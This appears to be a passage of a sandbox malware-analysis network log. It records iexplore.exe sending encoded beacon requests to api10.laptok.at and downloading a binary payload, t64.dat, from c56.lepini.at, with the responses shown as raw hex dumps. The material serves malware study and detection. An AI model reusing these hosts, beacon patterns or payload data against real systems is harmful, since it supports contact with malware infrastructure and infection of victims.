Nov 24, 2020 20:34:44.202896118 CET	971	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Nov 24, 2020 20:34:44.988176107 CET	971	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Nov 2020 19:34:44 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49765	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2020 20:35:27.597718000 CET	6145	OUT	GET /api1/1uvbKU_2Bbc/ULu41miz1odgDS/0s31zFbFtyChQRUZdq4O6/uZoXvkdGnqZk3S6m/sjGRAy2VVHXHIWC/GbATokLhfRKxJIkWlf/rpIWzL8Zz/AoLyYIkQLp5Egmn3wei2/_2BYsLzf0AqH_2FfXyU/ERE14WKmMp42qnHDG4GKCW/dW1JtsfpRq1bQ/nxcOGVyd/44_2FNnM0ZUEbkxaxhi6GSR/lIHQEHFzka/2x7wIaFlGrWFy74sl/6cFqI7aHF8g5/CnaY7J6ktLq/m_0A_0DTO0929p/475exW0EBf88dYERW4hkW/yci4B7l977luXmG4/ieH0MCQdwnavDmP/zBg2fJ8N/s HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Nov 24, 2020 20:35:28.619273901 CET	6147	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Nov 2020 19:35:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a 45 b6 83 40 14 44 17 c4 00 b7 21 ee 10 5c 66 10 dc dd 56 ff f3 4f e6 a1 a1 5f 57 dd 4b d2 dc 00 f6 4e f3 e3 e2 49 06 3f b5 1d 73 97 c5 05 11 f5 cd 87 bb 67 9f 88 a3 fc e7 2e 6c 0d 7a df 51 ed f9 40 a3 ad bb a7 9c 05 16 21 fc dc b4 49 71 8a 80 f6 13 4b 77 ef 04 6e 4f 99 1f b9 60 c3 2a 0f 8f 0d e8 13 83 7e 35 82 02 66 53 fd 49 32 d9 11 d9 a6 48 c3 f4 e6 d1 74 82 2f 36 3e e9 c1 a5 7f 1c 55 6d 9d d4 d9 a8 0b 8a 33 48 07 45 a3 5d 17 8e 61 6c 54 96 9d c9 51 4b 61 09 b6 e1 c1 59 27 ae 33 55 f7 a4 5e 6c 64 46 b0 89 21 4a fb a1 ef ae 7e 87 03 5a 16 85 e4 90 40 0b d5 a3 68 63 3a b3 a5 f3 ca bf 78 61 b6 f4 7a f4 6e 67 86 c0 e8 83 66 ca bd e1 d5 a3 05 75 f0 89 e7 ba 2e 87 15 ce d5 b5 d3 ee 89 4e 69 f0 8b 37 59 d5 b7 67 aa 80 52 9e 84 ed b5 2c 95 be d6 a9 3d 8d 3c 0a 4e 34 53 87 c6 81 dc 09 fa fc ae 01 51 45 36 7d 1c c5 8e 5a fa b5 9a af 03 36 33 f1 d9 f9 60 fa 5e 7c 77 35 03 07 30 9c 8a 1f 53 26 4e 73 9b 22 8f 85 7e 83 a2 11 91 5b 75 5f f9 3e bf df 4b 51 68 21 11 85 3a 9c 85 f4 cc 3e 37 c8 63 49 54 91 f1 9e 09 19 3f 45 70 10 ae 4f 84 95 cc f7 a6 03 32 71 54 d4 5f cf 88 81 64 4c 79 b9 b3 9c 98 b3 8e 0a fa 3a 88 aa bc f5 30 4a 63 88 c3 c8 d2 59 bf b7 da 8a 3d ae aa 0e e4 1b 6f 86 66 8b 40 28 c8 22 40 bb 08 c9 90 9f 00 c1 4a 00 c5 f6 19 c4 4c 7f 5b 61 e5 fb bc d6 28 7d ad 84 dd 42 1e f4 72 29 84 d7 da 67 0e 06 99 a0 8c 58 28 f2 1d 56 e0 67 db 4c e6 4d 93 6c ec cf 55 d9 80 15 da 5a ce f2 b5 f5 ad ed fe 0a 0f e5 93 e9 e4 a4 02 41 e1 e0 45 2f 3f 4f 3d 3a 22 b3 3d 83 76 50 b1 61 a9 bc d0 2c e5 52 fa db b4 55 01 68 09 03 d0 b1 db ee 92 3d 35 01 56 6f e5 1f 82 e4 75 df f4 5b 2e 91 e4 46 82 a3 bc bc 97 eb 21 ed e2 e3 f5 32 fe 6a e5 70 93 f5 f1 5d c1 8b e7 e2 3a 3c 69 41 d2 e7 67 ff a2 ea 8e 50 bb ae 2d 51 bd c6 e2 a8 8c 2d 6b 51 d8 4d 25 b6 70 a4 69 0b da 1f bf 5e 92 2c 3f 7a 65 48 4b 50 ed c4 ad 37 6f 6b 55 6b ca cc 03 02 34 4c 7c 9c a4 19 fa 14 f3 70 ac 64 9f 0f f9 cb 19 40 f8 e9 b4 90 16 ce 9e 61 9b 61 54 f9 38 db 21 bb ec 5c 2d 67 be 72 c6 e5 df 3a d4 c3 a0 e6 d7 c3 60 46 58 62 65 d2 b9 d1 ee f5 63 f6 40 2b 0d e1 04 65 59 c8 11 10 d4 63 a1 e3 17 eb 40 5a 61 22 a6 99 72 8f b4 02 b7 b2 ee ef 8c 62 dc c7 df 86 2e a3 9c 73 f9 1e 54 5e 8e 79 60 e5 8c c3 fb 3b fc 44 19 52 b3 d5 5e c4 eb fd c5 dc e3 98 70 fa b2 8c 4f 11 8b 47 e1 cd 77 73 aa f6 a5 5d cc f1 9b 00 40 c1 5f 0c ca 53 2d c8 89 15 6b 2e 06 0a 85 bb 6f 78 25 d3 ca 2e 64 01 50 11 96 4b b1 2e 36 8e 69 68 23 41 1f c2 26 2a 8a ac c3 e5 32 0c 91 b1 15 ff 2d 8f 98 19 df 83 72 ed 15 30 a9 9d 78 ae 4e f4 ea 26 75 0b 85 4b 44 0b 66 9f 33 52 dc 27 59 05 31 4d a7 e3 be 45 9d 1b 06 e5 64 a5 a4 02 86 55 9a 62 f4 95 26 bc 4d 20 3c e4 8f 0a dc f3 08 32 5d 17 b0 ee 22 73 c4 88 03 0e 21 17 8a 54 fa 90 ee 6a ba 1b 99 8e 89 65 20 05 96 d8 0d d6 a7 06 b6 88 a0 aa b2 6f ef 32 c4 b9 d9 31 ce ad f0 91 64 1d 56 a7 13 e8 ad 6b bf 7e 5b 69 13 ef d1 c8 b8 ab 95 1d d2 25 2c e8 b4 ca ac 93 c3 84 02 72 65 f0 01 5a 34 2a 09 f1 f5 40 d9 a0 81 1d b6 02 ab 97 0c da 33 5e 5a a1 22 7c 33 18 fc 50 05 45 93 2c 26 99 06 7f 2e c7 80 6e ad 23 20 af 51 3e 5b ca 79 aa 99 af af 9d dd 9c 88 4b 31 82 e6 d0 d6 Data Ascii: 2000E@D!\fVO_WKNI?sg.lzQ@!IqKwnO`~5fSI2Ht/6>Um3HE]alTQKaY'3U^ldF!J~Z@hc:xazngfu.Ni7YgR,=<N4SQE6}Z63`^\|w50S&Ns"~[u_>KQh!:>7cIT?EpO2qT_dLy:0JcY=of@("@JL[a(}Br)gX(VgLMlUZAE/?O=:"=vPa,RUh=5Vou[.F!2jp]:<iAgP-Q-kQM%pi^,?zeHKP7okUk4L\|pd@aaT8!\-gr:`FXbec@+eYc@Za"rb.sT^y`;DR^pOGws]@_S-k.ox%.dPK.6ih#A&2-r0xN&uKDf3R'Y1MEdUb&M <2]"s!Tje o21dVk~[i%,reZ4*@3^Z"\|3PE,&.n# Q>[yK1
Nov 24, 2020 20:35:28.619333029 CET	6148	IN	Data Raw: 71 ed f6 9e e1 c7 92 b7 3e 4c d2 7c 93 24 3c 31 d2 29 d7 41 95 d1 48 dd 6f 3b ad 6b cc df 29 35 ef 14 f8 52 8b aa 95 8d d9 86 cb dd 5b 87 53 8a ad 41 31 a6 ce ee 1e fb c4 09 46 5c 52 fd e5 f9 cf 16 5d eb 6b 8c 86 79 76 85 14 f5 28 8d 54 62 89 ac Data Ascii: q>L\|$<1)AHo;k)5R[SA1F\R]kyv(Tbu7r#d}G]%%'gX^OFyEW8mFD[wOa-dy\0R\|x3"`Qui+NtMotc:rKOUfWHA^r_,LD
Nov 24, 2020 20:35:28.619370937 CET	6149	IN	Data Raw: 2f 8b 5e 09 58 39 db 8d ae af 18 b2 b4 4c 02 09 65 b9 6c f6 0d 5e 0e 4a 2c 8f 09 3e bb e2 38 1e 10 bc 06 93 5c 70 50 d2 ea 9b d3 25 53 1d 9d 2e de 6e c7 35 1e 87 bb 7a 3b 3c c1 49 a9 8e 3d 25 83 20 dc e7 24 88 c8 4a bd 8d 64 a8 a2 b8 9b 92 99 cf Data Ascii: /^X9Lel^J,>8\pP%S.n5z;<I=% $JdBm&=Z '533z<3DM;g%jGg-l7VsgEPNL}co=aV4XJ^rgBixBs"5
Nov 24, 2020 20:35:28.619410038 CET	6151	IN	Data Raw: 32 c2 da ec a1 c8 81 7d 81 51 d8 43 9a 74 bb 83 22 89 d7 4c e7 f7 fd 99 00 99 66 71 d0 62 8c ca cb c2 17 a1 97 a8 fe b6 88 dc e8 fd eb ee 7a 5e 23 cc 17 cc 93 a9 ad ea 21 2a f2 0e 9d 36 9b 8d f1 9a 46 e3 85 22 28 28 5a 31 c3 4d bc ad ff 81 88 3c Data Ascii: 2}QCt"Lfqbz^#!*6F"((Z1M<(~K(\,]3g\@!"5859.UUgg+>a#,oJmEXkc=4)U?%nX_;DT!'}p]sT^
Nov 24, 2020 20:35:28.619446039 CET	6152	IN	Data Raw: d9 2e bb 36 00 db fd 13 9f 7d f1 b2 f6 c4 a2 14 53 1b 65 16 47 1a 18 85 f2 78 d7 83 0a 51 6b ff 4e 86 3c 5c 40 35 fc d2 e3 20 76 1c 72 4f c7 4d 83 d2 41 c4 cf 8c 7e b4 2f 0c 98 48 24 c5 11 26 fd 3a 1e 83 e3 27 2d 2e 54 fd dc 71 a8 1a 1e da 67 02 Data Ascii: .6}SeGxQkN<\@5 vrOMA~/H$&:'-.Tqgb'ED.G+w_3&x-[EUl~Sm\F&QreNzM_I..]\|(={oht!'^da>oy_1k/J[Vo=
Nov 24, 2020 20:35:28.619493008 CET	6153	IN	Data Raw: b5 08 d0 10 0e a7 85 2c e2 f2 ae ff 00 be 6a 29 94 96 12 af 20 35 03 0d 46 42 07 8e 3e f2 c2 6e 8f 61 7d 2a 17 45 57 81 1b d1 7b 1b 91 25 da a7 01 6b 61 02 bd ce 26 7c 87 06 8d fe e0 47 ee 0b 84 e9 61 b3 c9 5a 7d 9d f9 6d b5 93 7a f0 29 6e 7f c2 Data Ascii: ,j) 5FB>na}EW{%ka&\|GaZ}mz)n'eNp_\gOA%_5NdI$#v/H0sd(;O~h~Gnnq,QYlwSBfY,sZeDgDEe\|8r7-e*3kr`m}_$$
Nov 24, 2020 20:35:28.662935972 CET	6155	IN	Data Raw: 7d 7d db f2 dc 27 20 b0 05 4e be 9e 7b 8f 40 8d 5e 43 1e 24 68 f7 72 c3 a8 d5 e2 55 44 09 b4 7c 02 ec 47 ea 95 51 88 bc dc 0d ca b7 79 68 a7 d5 ed db 0a c1 7e 6e cc d6 02 5a 47 cb b5 70 a4 d4 75 d9 9b 5b a5 40 c8 a5 fb 9f 3d eb e0 3c 98 6d b4 7f Data Ascii: }}' N{@^C$hrUD\|GQyh~nZGpu[@=<mh>Qz>~<!Jw6_]DwY%UZcTmXRCX+##gP&A4k]YD;&@b>>a_)
Nov 24, 2020 20:35:28.662992001 CET	6156	IN	Data Raw: ff e1 3c f5 8f 9f cf eb 1d 09 d1 4e d1 39 13 0e 04 f7 7e ed af 08 f3 e9 ee 95 d3 cb ac c0 1c 1c ee 0a cd ab 36 00 89 1f d9 77 07 99 ea 3e 60 7d 4c 3e 73 a8 b6 5a 46 d0 0a e2 49 a0 be f2 e9 91 f5 0c fe e3 6c dd e9 d2 97 7b 9b 23 73 3f 8a 77 73 a5 Data Ascii: <N9~6w>`}L>sZFIl{#s?wsLOW.PhpU btV7t{?oVJ0/Yg:G-5e9o(YHPQW8 'PtO*qdl&{l+f\zz7S`?~"7?
Nov 24, 2020 20:35:28.663031101 CET	6158	IN	Data Raw: cc 0b 9c f1 c5 95 d6 69 2e 70 79 3d cc 58 8f f0 92 3c d6 63 30 78 fc b4 3a 28 4b 41 98 e9 0f 04 8d ba f3 0d 4a ba 89 cd 29 30 0a 24 de 2d 4b 3b e3 0f 6f 2b 8e 42 83 38 2d 29 51 e3 f5 bd 42 e9 1f 01 d5 6f 4f b8 5c 00 21 37 60 d1 3f 0c 5b d7 cf 56 Data Ascii: i.py=X<c0x:(KAJ)0$-K;o+B8-)QBoO\!7`?[V@p?z!mMJie5>bXLCEJ!ZQq"?'V=GVJXxI@2!(<"EXK>&0H5RmTQ@cd[\|aC9-grJ gezQ
Nov 24, 2020 20:35:28.663069010 CET	6159	IN	Data Raw: d8 33 a9 61 a8 09 28 ad 2b d1 96 30 42 c9 00 24 9c df e5 6c dc 17 97 e9 37 cc 45 d4 1e 10 47 a4 96 7d a6 a4 36 94 0a cd 82 5f 3d b4 4a 62 00 87 03 75 cd b2 42 13 17 c7 c7 db ee 67 19 0e 8d 67 32 1b e8 a8 0f 4e 46 27 2f 60 77 50 29 55 57 40 c2 44 Data Ascii: 3a(+0B$l7EG}6_=JbuBgg2NF'/`wP)UW@D\,Py1EcR!#8ofxu9j&y"]2;[RA}yvuWz{gM{[Mb`@rg<i`P:Y>Uy7;{!j~X>xK>R-
Nov 24, 2020 20:35:28.891160011 CET	6160	IN	Data Raw: 5c 57 d9 9d 9d ab fa ca 30 a7 19 68 12 fc 44 31 e8 06 46 69 6c 83 d5 29 66 32 2f 0b 35 7c 90 cf 07 00 fa ce d7 1e 9a 3e 59 43 c3 98 21 a8 ed 89 1a ef 56 d2 80 82 69 f8 0c 15 fb 52 b0 ab 7e 45 09 53 a5 e1 97 cc d0 e7 d2 72 da b9 82 5e 79 0b b9 68 Data Ascii: \W0hD1Fil)f2/5\|>YC!ViR~ESr^yhZGm/^kAbI`;]5Clh11Rcm3.g\D=J4lO1M2S/gvRpaE[g#c?D;*]uSTCcRHb

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49764	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2020 20:35:30.484663010 CET	6413	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Nov 24, 2020 20:35:31.301166058 CET	6413	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Nov 2020 19:35:31 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49767	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2020 20:35:32.350853920 CET	6415	OUT	GET /api1/tQTtTlNNyyTHp8mZxwj/87ufrUlrtp1usWYjjxq_2B/yAOH12_2F1IYJ/lKW5AYnq/_2BbaPBw_2BvxMvagxVqPyJ/jSUh2wAda1/gHbr670JVUq1KwK7N/6uxLXG5CHSWb/dgl5wFu8VM1/Rkwn44dvXkxcGr/6ai4evYmGZZapTEFZPM6t/l7dnGylpkoukj_2B/UIph5LMwbusYJYR/SgNVcjHjuu6gNQMV1u/yo8w_2BDc/tr29yULxa_2FW8vjKL1w/IkKYcWnRbp20t9pYrs_/0A_0DOoPdbEyCpXUb3P_2B/SP7qNsXNt82Vl/EBYqhcdo/ksN77WU_2Bu9u_2Bp6ImMCY/qmYYk7_2FYRubl/N HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Nov 24, 2020 20:35:33.336285114 CET	6416	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Nov 2020 19:35:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 34 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d d4 c5 91 85 00 00 44 c1 80 38 60 1f 3b e2 ee ce 0d 77 77 a2 df cd 60 aa de 54 17 39 a6 bf 1d fc 45 c4 ad c1 78 3a f9 8f 6a 67 1f 64 f9 66 90 e4 79 86 9a 61 8e a8 a9 8f 01 91 00 eb 9b 2d b4 18 13 10 47 fc 10 4c 70 24 9e d1 b5 ca af b2 26 d0 95 00 5c 5b 74 73 a0 be 17 b2 24 ee 2a 72 78 38 4a cf 87 38 7d 37 a1 47 dd 14 84 56 98 a6 cd d6 1d 52 e9 a4 7b 13 64 a7 3d de 19 9a bd 18 09 50 d9 8c 15 6b 43 8b 91 21 04 17 c2 d5 fb 96 1b e4 81 f6 05 39 58 62 e9 a7 4c 7b de 8f d2 89 1e 56 39 2e 94 20 42 8e ee f8 5a a6 0a 9e 8a 92 04 f3 e4 a0 3a 3a 5c 7b 5d 0e df 6b 60 f1 2c ef 20 8c aa 9a 50 e1 01 5f f5 24 9a 9b e9 e3 9a 32 01 1a f3 a7 84 7e 11 c3 22 ce 62 9e 4f 4c a2 01 b3 9f f4 d0 0f b5 7d 39 40 14 cc a6 f3 92 be 45 60 23 18 f7 94 b0 58 ec 4c 2a d7 b6 61 ff ad 21 ba 1a 61 14 f9 08 5a 4c 97 39 cd d8 8f e7 71 65 12 ee a5 43 53 02 eb 67 14 cc 06 9a 7b ae 12 f8 b8 96 a7 57 2e bb 02 4d a1 27 c4 e5 f9 37 93 57 5b 04 72 b8 f1 cb 1f a7 13 2b 5e c4 f8 ed 39 a9 42 01 fd 86 08 e9 0a a9 dd c3 2d 15 9d 7e a0 42 94 4e 8e 0a 24 3e 9a be 5f 35 4d 02 ac 79 03 82 c9 45 99 fc e9 67 fc 39 8e b3 2e 3a 65 db 3b 61 90 f7 59 39 16 f7 c8 7f 41 6d b8 6c 2b 2d 6c 8c 6e 90 06 6e 6c 78 e2 ce 34 3f 29 a9 83 9f 35 74 af cf 58 79 18 75 42 a0 70 cf 62 86 84 88 f7 60 9b ca a4 c7 db 5c ac 6c 40 cb d1 e1 37 8e ac 01 1b 24 b5 05 5c 43 3d 1b 17 18 96 31 2c 67 5b b9 84 0b 33 2f bf ce 7a 35 f3 0b 3b 3d 7a 3a 25 20 c6 8e 4a b9 63 c3 e3 7f 70 bf 4f 49 67 b9 de 92 cf 81 92 cb 0c 67 21 ee f5 56 2b ba 8f 73 e5 eb 07 c4 ec 81 24 aa dc 4e 98 94 a3 4a 47 4a 48 52 98 fc f2 97 9c db b5 c1 29 bd a1 0a 34 f4 73 0e 37 3f f6 73 90 a7 3e c4 48 9b d0 b6 c7 61 d2 82 40 36 01 a5 f9 13 f7 e0 66 70 02 06 0f 6f c8 b4 75 0a a8 c8 f7 52 e9 d0 c6 1c 23 78 8b 63 b0 5f 70 29 9a 8e a1 b1 0f 59 84 9c 97 0e 9d b4 56 95 00 74 01 8b 85 2a ce 1d c2 8c b9 93 9f 6b 47 e3 bc 2d 73 34 ba bf 08 5d 5a b7 bb 41 b7 b1 f2 1c e5 3a 23 e8 5c e7 eb 5f cd cc 6e 42 fb 9d a0 a1 2a e2 af ec 59 ec 0a 85 d0 14 66 20 82 61 5e 44 0f 4d 1a d2 c2 ea 34 df e0 34 27 fc 40 b9 05 49 6a 80 7c 41 f4 c6 fe 95 34 99 be e1 9b 36 e3 a4 ee e9 b9 59 c7 7a 5c f8 af e1 eb f9 40 1a d1 ad 61 dd 6c 58 a0 9e de de 29 bf d9 21 40 0b 27 10 3c 49 17 38 eb aa f8 98 2c 85 08 5f fc f2 75 55 6d d4 b8 bd 72 0b dc d2 f6 7d 47 26 06 1b 48 b7 90 17 bd 81 91 f5 cc 5b 5f 38 92 23 2f 00 57 a5 c0 d4 7e 2d 47 8e ad 72 54 2c 30 72 98 a8 de 34 7f 16 77 4e 4e cf 66 c1 a3 4f f9 ce d0 7a 85 21 96 84 1f 26 18 71 24 bf 0e d5 ed cf cd 3e 3f ea 60 f1 9e 1a dd b1 1b f2 ce 8c 09 ca fd d6 22 3e a2 f4 18 2d db c7 e3 b2 4f 30 cd b9 cf b6 7f 9b bc 01 8e 26 23 42 43 a9 d3 3a d9 f6 97 53 43 43 cc 42 0b e1 6b 0a 98 cd e6 8c 4d 96 c3 d7 fc 1a e4 f3 c8 49 88 cf 24 fb c6 b1 9b ca df 00 49 74 c5 f8 77 2f 08 c6 94 a9 b1 b2 60 d9 b3 78 ab dd 55 c3 8c 44 d7 76 7c 8d 7c 22 56 7c 75 18 cb b1 76 98 92 ab 13 c5 85 1c ff 14 28 85 4c 8d 74 ea a1 81 76 a9 06 09 2e 46 76 0e dd c2 f2 e0 1b 90 fd 55 24 aa 15 33 7f 15 b6 a6 23 cb 35 fe a0 05 ee 20 1a fb d1 37 d1 59 47 06 ef 64 52 1b 9c b3 4d b7 56 ae 4f f4 89 d6 68 43 9f 1c 7d f6 c3 1c 82 83 e1 32 b2 6c a3 c5 50 6a 62 9a e5 9c Data Ascii: 740D8`;ww`T9Ex:jgdfya-GLp$&\[ts$rx8J8}7GVR{d=PkC!9XbL{V9. BZ::\{]k`, P_$2~"bOL}9@E`#XLa!aZL9qeCSg{W.M'7W[r+^9B-~BN$>_5MyEg9.:e;aY9Aml+-lnnlx4?)5tXyuBpb`\l@7$\C=1,g[3/z5;=z:% JcpOIgg!V+s$NJGJHR)4s7?s>Ha@6fpouR#xc_p)YVtkG-s4]ZA:#\_nBYf a^DM44'@Ij\|A46Yz\@alX)!@'<I8,_uUmr}G&H[_8#/W~-GrT,0r4wNNfOz!&q$>?`">-O0&#BC:SCCBkMI$Itw/`xUDv\|\|"V\|uv(Ltv.FvU$3#5 7YGdRMVOhC}2lPjb
Nov 24, 2020 20:35:33.336338997 CET	6417	IN	Data Raw: ef 42 db 5f 1b 03 e6 e0 3b 81 9e ee b2 65 47 c2 35 9d 36 e8 bb 8a fb 23 34 8a 7f 27 f2 71 39 91 a4 44 ef 36 3d 98 73 0b af f1 16 43 99 99 b9 d0 da 63 5f b2 ee c8 9e 50 9c a4 b0 89 39 23 e6 3d aa 42 3e 52 7b 65 38 f2 aa d3 90 87 2a 7f 09 59 08 74 Data Ascii: B_;eG56#4'q9D6=sCc_P9#=B>R{e8*Yt%YoOX;&=hk'q;Ics;x\|M.b2NP~F&(6xhBAi]Wi&!EotN4G`}js~("16ZRE@Dy[

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49770	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2020 20:36:24.048608065 CET	6439	OUT	GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Nov 24, 2020 20:36:24.714663982 CET	6440	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Nov 2020 19:36:24 GMT Content-Type: application/octet-stream Content-Length: 138820 Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT Connection: close ETag: "5db6b84e-21e44" Accept-Ranges: bytes Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 